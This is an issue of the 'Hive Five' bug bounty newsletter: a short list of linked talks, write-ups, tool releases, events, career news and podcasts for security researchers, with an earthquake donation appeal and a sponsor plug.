🐝 Hive Five 108 – Bug Bounty Hunter Mindset, Android Malware Analysis course, and the Power of CSS injection

Hi friends,

Greetings from the hive!

I hope you had a good weekend. My thoughts go out to those impacted by the earthquake in Turkey and Syria.

When I heard the news, I immediately messaged my friend Mustafa to see if he was okay. Thankfully, he was. Not long after that, he called for the community to donate if they could.

The organization he mentioned is a NGO called ahbap. In addition, he is also the driving force behind HackerOne’s Hack for Good being set to The International Federation of Red Cross and Red Crescent Societies.

So, please help if you can. We’re all in this together.

Let’s take this week by swarm!

🐝 The Bee’s Knees

1. The InfoSec community needs you (yes, you). Why you should be writing blogs, appearing on podcasts, and presenting at conferences… and how to get started! more

2. A three day course on Android Malware Analysis presented by Dartmouth and the Android security team. day 1 | day 2 | day 3

3. Hussein Daher talks about “Bug Bounty On Steroids” at BSides Ahmedabad 0x03. more

4. Yassine, the keynote speaker at BSides Ahmedabad 2022 talks about bug bounty hunter mindset. more | slides

5. Unleashing the power of CSS injection: The access key to an internal API. The vulnerability was a CSS injection flaw that could be exploited in the application’s PDF generator. more

️💪 Sponsor

Sponsor the Hive Five and reach a highly engaged community of engineers, security researchers, and ethical hackers who are at the forefront of the industry.

🔥 Buzzworthy

✅ Changelog

1. Geekboy announced Nuclei Cloud, a SaaS platform built on the top of Project Discovery Nuclei open-source project to ease the automation experience at scale for everyone. more

2. gwen001/github-endpoints v1.2.2 - Find endpoints on GitHub. more

3. gwen001/github-search v2.0.1 - A collection of tools to perform searches on GitHub. more

4. ffuf v2.0 is out. There are two major features introduced with this release: scraper and FFUFHASH. more

5. In Hive Five 106 I shared the awesome Fearless CORS blog post. However, it was still being edited. Here’s the finished version of the blog post. more

📅 Events

1. The annual Women Cyberjutsu nominations are open. more

2. The defcon 31 Call for Policy Proposals is are open (due May 1). more

🎉 Celebrate

1. Sebastian Wieseler became a Senior Security Engineer. Congrats! more

2. TESS and team won Bugcrowd’s HackerCup2022. Let’s go! more

3. d0nut reached 20k followers on Twitter which means another challenge. Looking forward to it! more

4. Olivia announced that she joined a vulnerability research team, focusing on offensive security and open source software. Awesome! more

💰 Career

1. Meta’s bug bounty program is hiring for a analyst position. more

2. Jessica Crosby got laid off from Zoom and is looking for Offensive Application Security Engineer work. more

3. André is looking for a content creator who wants to join the mission of securing technology at Ethiack. more

4. Master Salary Negotiations with this Mind Map to showcase your contributions, achievements, outputs and strengths to demonstrate your value to your boss, and ultimately getting what you want. more

5. Here’s a bunch of helpful resources for finding a new job. more

⚡️ Community

1. Katie Paxton-Fear and Yassine join the HackerOne Hacker Advisory Board. more | tweet

2. shubs deeply appreciates all the people that he has had the chance to work with positively. more

3. Six2dez experiencing some firsts: landing in Helsinki, attending Disobey, giving a 4-hour workshop with joohoi, and more. more

4. Lilly looking further into permaculture. more

📰 Read

1. Reversing UK mobile rail tickets. What data is inside the barcode of a mobile ticket, and how do they work? more

2. Why are you getting indexed by crawlers. Addressing concerns over privacy and security, and offering solutions. more

3. Azuredly attacking Azure… For the second part in this attacking cloud series, they will attack AzureGoat which is an intentionally vulnerable Azure lab environment with multiple paths to privilege escalation. more

4. How Dawid and Klaudia made $120k bug bounty in a year with good automation. more

📚 Resources

1. What hackers invest their bug bounty earnings in. more

2. What Should You Do After Recon?! One of the most popular questions Ben gets asked. more

3. RustCrypto/formats: Cryptography-related format encoders/decoders: DER, PEM, PKCS, PKIX. more

4. Hunter is a search engine for security researchers. more

5. Burp Suite Certified Practitioner Exam study notes. more

🎥 Watch

1. HackTheBox - Photobomb walkthrough (a ruby Sinatra Web App).more

2. Broken Access Control - Lab #3 User role controlled by request parameter. This lab has an admin panel at /admin, which identifies administrators using a forgeable cookie. more

3. How Hackers Run For The Money. more

4. Generating ETH from thin air. This video is an explanation of a vulnerability in Aurora’s Rainbow bridge. It could allow a malicious attacker to generate Ethereum from thin air. It was rewarded $1 mln bug bounty. more

🎵 Listen

1. Day[0] Binary Exploitation Podcast 186 - An XNU Exploit and a Chrome Heap Overflow. more

2. Day[0] Bug Bounty Podcast 185 - Facebook Account Takeovers and a vBulletin RCE. Is it possible to escalate a self-XSS into an account takeover? more

3. Risky Business #694 - Cleansing fire claims ESXi, GoAnywhere servers. more

4. Critical Thinking Bug Bounty Podcast Episode 6 - A sit down with mobile hacking legend Joel Margolis and get the scoop on his approach to popping bugs on Android. more

5. The Privacy, Security, & OSINT Show 289 - Combo Lists & Extreme Privacy Series. In this episode they discuss the risks (and benefits) of combo lists and introduce our new Extreme Privacy Series. more

Get $100 to try DigitalOcean. The go-to VPS for bug bounty hunters. I use it for all of my own recon and automation needs, plus it also doubles as a VPN. They have every cloud resource you need at an affordable price.

Subscribe to the Hive Five to read the rest.